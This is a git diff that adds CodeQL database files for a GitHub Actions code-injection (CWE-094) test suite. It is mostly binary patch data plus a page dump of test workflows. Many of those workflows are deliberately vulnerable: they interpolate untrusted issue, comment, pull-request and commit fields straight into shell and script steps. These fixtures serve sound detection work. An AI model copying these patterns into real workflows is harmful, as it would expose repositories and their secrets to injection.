z=c;F)gsINYDf--LnD&YJo!b!wFr8_EEj7!Grt!{@P21Nx&Vgwzsp}V8E{ADM(nak6(c4ou0?sr z#jBa+yPoOR|IG3WA8051fVGj+-Z|v{SPNcn7hQN2Y5>z(xE$yjX$Dhmc_vXVB{20_ zF=c0QB~14{IAO0<15C9AYHLZqh8M!sx#1g(Eb%i39Qka+p4%|x%*-n8YJ%zP%Ba5R zCODJ#?pSZ+l%oe5B7UJyCDH??{3T(1ikq1?NFM9i4O<|t5El2eipA9?sUrszuC(8*g zZwnWi&CA!{7jZ)#rd~};+$@*P;vq^OzF%h+{b=HT4^~0Wj0u`YI#@jD?Zz+t%n?It zzDikhTm*6wGNUIa!g}x^pSdGSU?cclbh_bJnCeVA_2#4C9G=e@$5qL})PE_h>F4Ia zbnS{B^}ZmOuHDyZ`R^H)<6Se?qZ!7lmXmfIq9bjCpK;;JhGiPIySqhK+( z@pAgn1b7f!94!!%0*{A9trA}r!!(X!je0^QOy@@Ojnlgy!gSxAOPeyC=JM(py-c9j z2VRA^)%<(0b#MeMQnVm${yg40eNB*`^m>@;KV?xb7S7yJ->;qoiy;2yVXWvOn9j+t zmLSP27H>y98&*Z!ChKzJ9hk=1qp`;KDf5ed&z=t~-@rXu^ear`%)98S{1c{g^`w_i z^@RDnxeI$O$uNTHzHc$U87u^QY71~v;gN9T%$sJ;Fx^Yov!G`kv+Ty*17Ywu#P^ol zFFy{8!6Fzlm*t!j&hNj;Jd%48*8uND&L4|~OPAX5el8HN9qhIWrfXBwR#HBT1?v@=1tF%=TO#5WXcG>GyFkXe+TrUNA0ejwa9Tlc8XbIzJ;u>ww zA@8+9&Il8+Ol+!1-w0Z^p<$38B942W$u4NVCuuv^8#ErybT`bb>wR= zyaA4zaCY-b98grJl)b9$T38$&h@6xb2oHw)YeWBp!nF6cPn*a^z|`lJ`lm&rVF_3_ zWm{bmOyj&i?pKrw)3uq}NgbIm?Mcfg!(4M<>cf>*m(_(ZjniS5ELsB7_%^BdzQp2D zM{`6gVe03efTa8fFx94VbRh3JEDIZ@8exKhW-W=mG$Cof& z8+GJR-8-22UwhebWDh(Veq~>TI9Y3EQNUSz_w}j zFx8wGWWqVXG?xJFKf=y1&G)5k^I3P8_FLfBJD)Z&m;XFz5(U$>_Z>{Qy)eB)x8Gi9 zn8|Vk*9BBxVs0HaMZFTH_vZJ-W2>IS)MvGgUoW=8)Mrj-zQsG3YH&IGOXL$w&r6BE zon|jgb6NG%M^ey{ci&eHx|}FX-`NVLY`LHYQ=KjyiZVvbIp$f~*6>ioa|6RJJF)oo z>wn%L#Q(+b0KWtL4)8m`?*P98{0{It!0!OR1N;u~JHYP%zXSXZ@H@co0KWtL4)8m` e?*P98{0{It!0!OR1N;u~JHYP%zXSizI`Ds=z%tSR literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/pools/0/pageDump/page-000000000 b/db/db-yaml/default/pools/0/pageDump/page-000000000 new file mode 100644 index 000000000000..e8abb81542c7 --- /dev/null +++ b/db/db-yaml/default/pools/0/pageDump/page-000000000 @@ -0,0 +1,55 @@ +/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/Users/pwntester/src/github.com/githubsecuritylab/Users/pwntester/src/github.com/Users/pwntester/src/Users/pwntester/Users/nametag:yaml.org,2002:strIssue Workflowontag:yaml.org,2002:boolissuestypesopenededitedtag:yaml.org,2002:seq[opened, edited]tag:yaml.org,2002:maptypes: ... edited]issues:jobsredirectIssueruns-onubuntu-latestCheck for issue transferCheck f ... ransferenvcontent_analysis_responsecontent ... esponseundefinedcontent ... definedstepsusesactions/checkout@v2uses: a ... kout@v2Remove conflicting charsRemove ... g charsISSUE_TITLE${{github.event.issue.title}}${{gith ... title}}ISSUE_T ... title}}frabert/replace-string-action@1.2frabert ... ion@1.2idremove_quotationswithpattern""\""string${{env.ISSUE_TITLE}}replace-with-"-"pattern: "\""name: R ... g charsCheck infocheck-inforunecho "foo $(pwsh bar ${{steps.remove_quotations.outputs.replaced}}) " >> $GITHUB_ENV +|name: Check info- uses: ... kout@v2runs-on ... -latestredirectIssue:name: Issue Workflow/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.ymlCIpull_requestbranchesmain- mainbranches:pull_request:changed_filesTest changed-filesactions/checkout@v4fetch-depth0tag:yaml.org,2002:intfetch-depth: 0uses: a ... kout@v4Get changed fileschanged-filestj-actions/changed-files@v40tj-acti ... les@v40name: G ... d filesList all changed filesList al ... d filesfor file in ${{ steps.changed-files.outputs.all_changed_files }}; do + echo "$file was changed" +done +name: L ... d files- uses: ... kout@v4changed_files:name: CI/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.ymlissue_commentecho-chamberecho '${{ github.event.comment.body }}' +run: |- run: |echo-chamber2echo '${{ github.event.comment.body }}'echo '$ ... ody }}'run: ec ... ody }}'echo '${{ github.event.issue.body }}'echo '${{ github.event.issue.title }}'echo '$ ... tle }}'run: ec ... tle }}'- run: ... ody }}'echo-chamber3actions/github-script@v3actions ... ript@v3scriptconsole.log('${{ github.event.comment.body }}')console ... dy }}')script: ... dy }}')uses: a ... ript@v3console.log('${{ github.event.issue.body }}')console.log('${{ github.event.issue.title }}')console ... le }}')script: ... le }}')- uses: ... ript@v3echo-chamber:on: issue_comment/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross1.yml[opened,edited]permissions{}ISSUE_BODY${{github.event.issue.body}}${{gith ... .body}}outputsresult${{env.content_analysis_response}}${{env. ... ponse}}result: ... ponse}}Check Issue Titleactions-ecosystem/action-regex-match@v2actions ... atch@v2regex-matchtextregex^[A-Za-z0-9 _.]*$'^[A-Za-z0-9 _.]*$'flagsgtext: $ ... title}}name: C ... e TitleExit Jobif${{ steps.regex-match.outputs.match == '' }}${{ ste ... = '' }}echo "Bad Issue Title Format" +exit 1 +name: Exit Jobfrabert/replace-string-action@v2.5frabert ... on@v2.5'-'Check InformationISSUE_TITLE_PARSED${{steps.remove_quotations.outputs.replaced}}${{step ... laced}}ISSUE_T ... laced}}echo "content_analysis_response=$(pwsh .\\.github\\scripts\\title_analyzer.ps1)" >> $GITHUB_ENV +name: C ... rmationLabel issueenv.content_analysis_response != 'Valid'env.con ... 'Valid'curl -v -u admin:${{ secrets.DYNAMOBOTTOKEN }} -d '{"labels": ["${{env.content_analysis_response}}"]}' ${{ github.event.issue.url }}/labels +name: Label issuename: C ... ransfercheckIssueInformationcheckIs ... rmationneeds.redirectIssue.outputs.result == 'Valid'needs.r ... 'Valid'Check for missing informationCheck f ... rmationneedsanalysis_responsegreetings_commentThank you for submitting the issue to us. We are sorry to see you get stuck with your workflow. While waiting for our team member to respond, please feel free to browse our forum at https://forum.dynamobim.com/ for more Dynamo related information."Thank ... orry tocomment_introHello ${{ github.actor }}, thank you for submitting this issue! We are super excited that you want to help us make Dynamo all that it can be."Hello ... issue! needs_more_info_commentneeds_m ... commentHowever, we need some more information in order for the Dynamo team to investigate any further.\n\n"Howeve ... Dynamoclose_issue_commentHowever, given that there has been no additional information added, this issue will be closed for now. Please reopen and provide additional information if you wish the Dynamo team to investigate further.\n\n"Howeve ... added, info_neededAdditional information:\n - Filling in of the provided Template (What did you do, What did you expect to see, What did you see instead, What packages or external references (if any) were used)\n - Attaching the Stack Trace (Error message that shows up when Dynamo crashes - You can copy and paste this into the Github Issue)\n - Upload a .DYN file that showcases the issue in action and any additional needed files, such as Revit (Note: If you cannot share a project, you can recreate this in a quick mock-up file)\n - Upload a Screenshot of the error messages you see (Hover over the offending node and showcase said errors message in the screenshot)\n - Reproducible steps on how to create the error in question."Additi ... ion:\\nspecific_infoCan you please fill in the following to the best of your ability:"Can yo ... ility:"templateISSUE_TEMPLATE.md"ISSUE_TEMPLATE.md"issue_labelneeds more infoacceptable_missing_infoaccepta ... ng_info1analysi ... definedISSUE_B ... .body}}${{env.ISSUE_BODY}}${{ steps.remove_quotations.outputs.replaced }}${{ ste ... aced }}ISSUE_B ... aced }}echo "analysis_response=$(pwsh .\\.github\\scripts\\issue_analyzer.ps1 "${{ env.template }}" "${{ env.acceptable_missing_info }}" )" >> $GITHUB_ENV +Close issueenv.analysis_response == 'Empty'env.ana ... 'Empty'curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.comment_intro}} ${{env.close_issue_comment}} ${{env.info_needed}}"}' ${{ github.event.issue.url }}/comments +curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -X PATCH -d '{"state": "closed"}' ${{ github.event.issue.url }} +name: Close issueLabel and comment issueLabel a ... t issue((env.analysis_response != 'Valid') && (env.analysis_response != 'Empty') && (github.event.action == 'opened'))((env.a ... ened'))curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"labels": ["${{env.issue_label}}"]}' ${{ github.event.issue.url }}/labels +curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.comment_intro}} ${{env.needs_more_info_comment}} ${{env.specific_info}} ${{env.analysis_response}}.\n\n${{env.info_needed}}"}' ${{ github.event.issue.url }}/comments +name: L ... t issueUnlabel updated issueUnlabel ... d issueenv.analysis_response == 'Valid' && github.event.action == 'edited'env.ana ... edited'echo urldecode ${{env.issue_label}} +curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -X DELETE ${{ github.event.issue.url }}/labels/$(echo -ne "${{env.issue_label}}" | xxd -plain | tr -d '\n' | sed 's/\(..\)/%\1/g') +name: U ... d issueGreetingsenv.analysis_response == 'Valid' && github.event.action == 'opened'env.ana ... opened'curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.greetings_comment}}"}' ${{ github.event.issue.url }}/comments +name: Greetingsif: nee ... 'Valid'/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross2.ymlIssue Type Predicterissue_type_Predicterparsed_issue_bodyissue_json_stringis_wish_listCheckout Dynamo Reponame: C ... mo RepoRemove Quotesremove_quotes${{ github.event.issue.body }}${{ git ... body }}ISSUE_B ... body }}${{ env.ISSUE_BODY }}${{ env ... BODY }}name: Remove QuotesAnalyze Issue Body${{ steps.remove_quotes.outputs.replaced }}echo "analysis_response=$(pwsh .\\.github\\scripts\\issue_analyzer.ps1 "${{ env.template }}" "${{ env.acceptable_missing_info }}")" >> $GITHUB_ENV +name: A ... ue BodyClean Issue Bodyenv.analysis_response == 'Valid'env.ana ... 'Valid'ISSUE_BODY_PARSEDecho "parsed_issue_body="$(pwsh .\\.github\\scripts\\issue_body_cleaner.ps1 )"" >> $GITHUB_ENV +name: C ... ue BodyCreate Issue JSON StringCreate ... StringISSUE_NUMBER${{ github.event.issue.number }}${{ git ... mber }}${{ github.event.issue.title }}${{ git ... itle }}ISSUE_N ... mber }}echo "issue_json_string="$(pwsh .\\.github\\scripts\\get_issue_json_body.ps1 "$ISSUE_NUMBER")"" >> $GITHUB_ENV +name: C ... StringCheckout IssuesTypePredicter RepoCheckou ... er ReporepositoryDynamoDS/IssuesTypePredicterDynamoD ... edicterpathIssuesTypePredicterreposit ... edictername: C ... er RepoSetup dotnetactions/setup-dotnet@v4actions ... tnet@v4dotnet-version3.1.0'3.1.0'dotnet- ... '3.1.0'name: Setup dotnetBuild Issues Type PredicterBuild I ... edicterdotnet build ./IssuesTypePredicter/IssuesTypePredicter.sln --configuration Release +cp ./IssuesTypePredicter/IssuesTypePredicterML.ConsoleApp/bin/Release/netcoreapp3.1/MLModel.zip . +name: B ... edicterRun Issues Type PredicterRun Iss ... edicterecho "is_wish_list="$(dotnet run -p ./IssuesTypePredicter/IssuesTypePredicterML.ConsoleApp/IssuesTypePredicterML.ConsoleApp.csproj -v q "${{ env.issue_json_string }}")"" >> $GITHUB_ENV +name: R ... edicterLabel issue as 'Wishlist'Label i ... shlist'env.analysis_response == 'Valid' && contains(env.is_wish_list, 'IsWishlist:1')env.ana ... ist:1')GH_TOKEN${{ secrets.DYNAMO_ISSUES_TOKEN }}${{ sec ... OKEN }}GH_TOKE ... OKEN }}gh issue edit ${{ github.event.issue.number }} --add-label "Wishlist" --repo ${{ github.repository }} +name: L ... shlist'Label issue as 'NotMLEvaluated'Label i ... luated'env.analysis_response != 'Valid' || env.issue_json_string == ''env.ana ... g == ''gh issue edit ${{ github.event.issue.number }} --add-label "NotMLEvaluated" --repo ${{ github.repository }} +name: L ... luated'- name: ... mo Reponame: I ... edicterissue_t ... dicter:/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross3.ymlCherry pickingpushmaster- masterpush:cherry_pickdestination_branchinvalid'invalid'auto_branchauto-${{github.event.after}}'auto-$ ... fter}}'user_nameDynamo-Bot"Dynamo-Bot"destina ... nvalid'checkoutactions/checkout@v3name: checkoutfrabert/replace-string-action@v1.2frabert ... on@v1.2${{github.event.commits[0].message}}${{gith ... ssage}}ISSUE_B ... laced}}echo "destination_branch=$(pwsh .\\.github\\scripts\\cherry_pick_check.ps1 "${{ env.ISSUE_BODY_PARSED }}" )" >> $GITHUB_ENV +env.destination_branch != 'invalid'env.des ... nvalid'Create PR to branchgit config user.name "${{env.user_name}}" +git fetch --all +git checkout -b ${{env.auto_branch}} origin/${{env.destination_branch}} +git cherry-pick -x ${{github.event.after}} --strategy-option theirs +git push -u origin ${{env.auto_branch}} +hub pull-request -b "${{env.destination_branch}}" -h "${{env.auto_branch}}" -m "${{env.pr_message}}" +GITHUB_TOKEN${{secrets.DYNAMOBOTTOKEN}}${{secr ... TOKEN}}pr_messageCherry-Pick from commit: ${{github.event.after}} + +### Cherry-picking: +[Commit](https://github.com/DynamoDS/Dynamo/commit/${{github.event.after}}) + +### Pull request: +${{ env.ISSUE_BODY_PARSED }} +GITHUB_ ... TOKEN}}if: env ... nvalid'- name: checkoutcherry_pick:name: Cherry picking/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.ymldiscussionecho '${{ github.event.discussion.title }}'echo '${{ github.event.discussion.body }}'- run: ... tle }}'on: discussion/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.ymldiscussion_commenton: dis ... comment/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.ymlgollumecho '${{ github.event.pages[1].title }}'echo '${{ github.event.pages[11].title }}'echo '${{ github.event.pages[0].page_name }}'echo '$ ... ame }}'run: ec ... ame }}'echo '${{ github.event.pages[2222].page_name }}'echo '${{ toJSON(github.event.pages.*.title) }}'echo '$ ... le) }}'run: ec ... # safeon: gollum/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.ymlImage URL Processingcreated[created]types: [created]issue_comment:process-image-urlcontains(github.event.comment.body, 'https://github.com/github/release-assets/assets/')contain ... sets/')Checkoutname: CheckoutExtract and Clean Initial URLExtract ... ial URLextract-urlBODY${{ github.event.comment.body }}BODY: $ ... body }}echo "::set-output name=initial_url::$BODY" +name: E ... ial URLGet Redirected URL with DebuggingGet Red ... buggingcurlINITIAL_URL${{ steps.extract-url.outputs.initial_url }}${{ ste ... _url }}INITIAL ... _url }}echo "redirected_url=$(echo $INITIAL_URL)" >> $GITHUB_OUTPUT +name: G ... buggingTrim URL after PNGtrim-urlREDIRECTED_URL${{ steps.curl.outputs.redirected_url }}REDIREC ... _url }}echo "trimmed_url=$(echo $REDIRECTED_URL)" >> "$GITHUB_OUTPUT" +name: T ... ter PNGUpdate Comment with New URLUpdate ... New URLNEW_COMMENT_BODY="Use this link to include this asset in your changelog: ${{ steps.trim-url.outputs.trimmed_url }}" +name: U ... New URL- name: Checkoutprocess-image-url:name: I ... cessing/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job.ymljob1job_output${{ steps.step.outputs.value }}${{ ste ... alue }}job_out ... alue }}sourceRemove foo from changed filesRemove ... d filesstepmad9000/actions-find-and-replace-string@3mad9000 ... tring@3${{ steps.source.outputs.all_changed_files }}${{ ste ... iles }}findfoo'foo'replace''source: ... iles }}name: R ... d filesjob2${{ always() }}sinkecho ${{needs.job1.outputs.job_output}}echo ${ ... utput}}id: sink- id: sinkjob1:on: push/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yamlglobal_envtestglobal_ ... itle }}job_envjob_env ... itle }}echo '${{ env.global_env }}'echo '$ ... env }}'run: ec ... env }}'echo '${{ env.test }}'echo '$ ... est }}'run: ec ... est }}'echo '${{ env.job_env }}'echo '${{ env.step_env }}'step_envstep_en ... itle }}env:on: issues/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix.ymlCodeQL Auto Language"CodeQL ... nguage"[ main ]branches: [ main ]schedulecron17 19 * * 6'17 19 * * 6'cron: '17 19 * * 6'- cron: ... * * 6'create-matrixmatrix${{ steps.set-matrix.outputs.all_changed_files }}matrix: ... iles }}set-matrix- name: ... d filesanalyze${{ needs.create-matrix.outputs.matrix != '[]' }}${{ nee ... '[]' }}Analyzeactionsreadcontentssecurity-eventswriteactions: readstrategyfail-fastfalselanguage${{ fromJSON(needs.create-matrix.outputs.matrix) }}${{ fro ... rix) }}languag ... rix) }}fail-fast: falseCheckout repositoryname: C ... ository${{ matrix.language }} +| run: | - name: ... ositoryneeds: create-matrixcreate-matrix:name: " ... nguage"/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow1.ymlsimple1${{ github.event.head_commit.message }}${{ git ... sage }}source: ... sage }}id: source no-stepecho "test=foo" >> "$GITHUB_OUTPUT"echo "t ... OUTPUT"id: no-stepecho "echo ${{steps.no-step.outputs.foo}}" +- id: source simple1:/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow2.ymlfoobarfoo'foobarfoo'source: 'foobarfoo'for file in ${{ steps.step.outputs.value }}; do + echo "$file was changed" +done +/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.ymlpull_request_reviewecho '${{ github.event.pull_request.title }}'echo '${{ github.event.pull_request.body }}'echo '${{ github.event.pull_request.head.label }}'echo '$ ... bel }}'run: ec ... bel }}'echo '${{ github.event.pull_request.head.repo.default_branch }}'echo '$ ... nch }}'run: ec ... nch }}'echo '${{ github.event.pull_request.head.repo.description }}'echo '$ ... ion }}'run: ec ... ion }}'echo '${{ github.event.pull_request.head.repo.homepage }}'echo '$ ... age }}'run: ec ... age }}'echo '${{ github.event.pull_request.head.ref }}'echo '$ ... ref }}'run: ec ... ref }}'echo '${{ github.event.review.body }}'on: pul ... _review/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.ymlpull_request_review_commentpull_re ... commenton: pul ... comment/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.ymlpull_request_targetrun: ec ... definedecho '${{ github.head_ref }}'- run: ... definedon: pul ... _target/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.ymlecho '${{ github.event.commits[11].message }}'echo '${{ github.event.commits[11].author.email }}'echo '$ ... ail }}'run: ec ... ail }}'echo '${{ github.event.commits[11].author.name }}'echo '${{ github.event.head_commit.message }}'echo '${{ github.event.head_commit.author.email }}'echo '${{ github.event.head_commit.author.name }}'echo '${{ github.event.head_commit.committer.email }}'echo '${{ github.event.head_commit.committer.name }}'echo '${{ github.event.commits[11].committer.email }}'echo '${{ github.event.commits[11].committer.name }}'- run: ... age }}'/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.ymlsummaryid: summaryflowecho "${{steps.summary.outputs.value}}" +id: flow no-flowecho "${{steps.summary.outputs.foo}}" +id: no-flow- id: summary/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml[pull_r ... equest]for file in ${{ steps.source.outputs.all_changed_files_count }}; do + echo "$file was changed" +done +/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml${{ steps.step2.outputs.test }}${{ ste ... test }}job_out ... test }}step0id: step0 step1${{ steps.step0.outputs.value}}${{ ste ... value}}BODY: $ ... value}}shellpowershellWrite-Output "::set-output name=MSG::$ENV{BODY}" +id: step1step2MSG${{steps.step1.outputs.MSG}}${{step ... s.MSG}}MSG: ${ ... s.MSG}}echo "test=$MSG" >> "$GITHUB_OUTPUT"id: step2run: ec ... utput}}- run: ... utput}}/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run.ymlworkflow_runworkflows[test]workflows: [test]workflow_run:echo '${{ github.event.workflow_run.display_title }}'echo '${{ github.event.workflow_run.head_commit.message }}'echo '${{ github.event.workflow_run.head_commit.author.email }}'echo '${{ github.event.workflow_run.head_commit.author.name }}'echo '${{ github.event.workflow_run.head_commit.committer.email }}'echo '${{ github.event.workflow_run.head_commit.committer.name }}'echo '${{ github.event.workflow_run.head_branch }}'echo '${{ github.event.workflow_run.head_repository.description }}'on:/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action1/action.yml/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action1'test'descriptionbrandingiconcoloricon: 'test'inputsrequireddefaultdescription: testtest:runsusingcomposite"composite"using: "composite"name: 'test'/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action2/action.yml/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action2Hello World'Hello World'Greet someone and record the time'Greet ... e time'who-to-greetWho to greet'Who to greet'trueWorld'World'descrip ... greet'who-to- ... f inputtimeThe time we greeted you'The ti ... ed you'descrip ... ed you'time: # id of outputdocker'docker'imageDockerfile'Dockerfile'args${{ inputs.who-to-greet }}${{ inp ... reet }}- ${{ i ... reet }}using: 'docker'name: 'Hello World'hSt¹>w \ No newline at end of file diff --git a/db/db-yaml/default/pools/1/buckets/info b/db/db-yaml/default/pools/1/buckets/info new file mode 100644 index 0000000000000000000000000000000000000000..0111728636533e2c31d7b0489e64f46bcd4d6cf2 GIT binary patch literal 40 ecmZQz00Tw{#Q>$5|AY89zRa8gqUTSZdItbEj0T|q literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/pools/1/buckets/page-000000 b/db/db-yaml/default/pools/1/buckets/page-000000 new file mode 100644 index 0000000000000000000000000000000000000000..6d17cf9d15fb9f4a2358a2d079f3b8c755d005fa GIT binary patch literal 8192 zcmeIu0Sy2E0K%a6Pi+o2h(KY$fB^#r3>YwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/pools/1/ids1/info b/db/db-yaml/default/pools/1/ids1/info new file mode 100644 index 0000000000000000000000000000000000000000..799471fd4d54d409c98d3b7826deaac67913dc99 GIT binary patch literal 40 ecmZQz00Tw{#Q>!l|AY89zRa8gqGzYMJ_GYwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/pools/1/indices1/info b/db/db-yaml/default/pools/1/indices1/info new file mode 100644 index 0000000000000000000000000000000000000000..799471fd4d54d409c98d3b7826deaac67913dc99 GIT binary patch literal 40 ecmZQz00Tw{#Q>!l|AY89zRa8gqGzYMJ_GYwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/pools/1/info b/db/db-yaml/default/pools/1/info new file mode 100644 index 0000000000000000000000000000000000000000..9b4ec24220f77cd70a002420d93e390bfc4c1f7a GIT binary patch literal 41 ccmZQz00U+q$+QN785kjAU>eL`E;&&F04bXS)Bpeg literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/pools/1/metadata/info b/db/db-yaml/default/pools/1/metadata/info new file mode 100644 index 0000000000000000000000000000000000000000..9cdb710dfd9490f67f5103cbab69eb12829f96b4 GIT binary patch literal 40 ecmZQz00Tw{#lZL<3PAiDUuI4L(W_e5uLA(d%ME}4 literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/pools/1/metadata/page-000000 b/db/db-yaml/default/pools/1/metadata/page-000000 new file mode 100644 index 0000000000000000000000000000000000000000..6d17cf9d15fb9f4a2358a2d079f3b8c755d005fa GIT binary patch literal 8192 zcmeIu0Sy2E0K%a6Pi+o2h(KY$fB^#r3>YwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/pools/1/pageDump/page-000000000 b/db/db-yaml/default/pools/1/pageDump/page-000000000 new file mode 100644 index 0000000000000000000000000000000000000000..7bccaeb20c898fd660036bab54ae98c20280d0a3 GIT binary patch literal 1048592 zcmeIuF%bYT48*X95C8>I#^n|iy>Q4V1Mr|k1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 